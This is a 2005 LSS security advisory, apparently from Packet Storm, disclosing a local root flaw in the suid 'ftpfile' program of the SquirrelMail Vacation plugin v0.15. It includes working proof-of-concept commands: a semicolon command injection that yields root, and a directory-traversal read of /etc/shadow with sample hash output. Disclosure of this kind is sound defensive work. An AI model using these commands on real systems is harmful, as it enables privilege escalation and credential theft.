LSS-2005-01-03.txt

Date: 12 Jan 2005
Reported by: Leon Juranic
Type: packetstorm
Source: packetstormsecurity.com

Local root exploit in Squirrelmail vacation plugin allows privilege escalation and file read.

`  
LSS Security Advisory #LSS-2005-01-03  
http://security.lss.hr  
  
---  
  
Title : Squirrelmail vacation v0.15 local root exploit   
Advisory ID : LSS-2005-01-03  
Date : 10.01.2005.   
Advisory URL : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03  
Impact : Privilege escalation and arbitrary file read  
Risk level : High   
Vulnerability type : Local  
Vendors contacted : No response from vendor  
  
  
---  
  
  
  
===[ Overview   
  
The Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply  
message for incoming email. This is commonly used to notify the sender of  
the receiver's absence. The plugin specifically uses the Vacation program.  
The plugin can be downloaded from:  
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz  
  
  
  
===[ Vulnerability  
  
The Squirrelmail Vacation plugin includes a suid root program, 'ftpfile'.  
The program is used to access local files in the user's home directory. It  
contains a privilege escalation and arbitrary file read vulnerability.  
Command-line arguments are passed to the execve() function without checking  
for meta-characters, which makes it possible to execute commands as root.  
  
[ljuranic@laptop ljuranic]$ id  
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"  
/bin/cp: omitting directory `/root/0'  
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$   
  
It is also possible to read restricted files (such as /etc/shadow), since  
ftpfile can copy a file from the user's home directory to any other  
directory without checking the file name for directory traversal.  
  
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow  
./shadow[ljuranic@laptop ljuranic]$ head ./shadow  
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::  
bin:*:10929:0:99999:7:::  
daemon:*:10929:0:99999:7:::  
lp:*:10929:0:99999:7:::  
[ljuranic@laptop ljuranic]$   
  
  
  
===[ Affected versions  
  
Squirrelmail Vacation v0.15 and previous versions.  
  
  
  
===[ Fix  
  
Not available yet.  
  
  
  
===[ PoC Exploit  
  
http://security.lss.hr/exploits/  
  
  
  
===[ Credits  
  
Credit for this vulnerability goes to Leon Juranic.  
  
  
  
===[ LSS Security Contact  
  
LSS Security Team, <eXposed by LSS>  
  
WWW : http://security.lss.hr  
E-mail : [email protected]  
Tel : +385 1 6129 775  
  
  
  
`
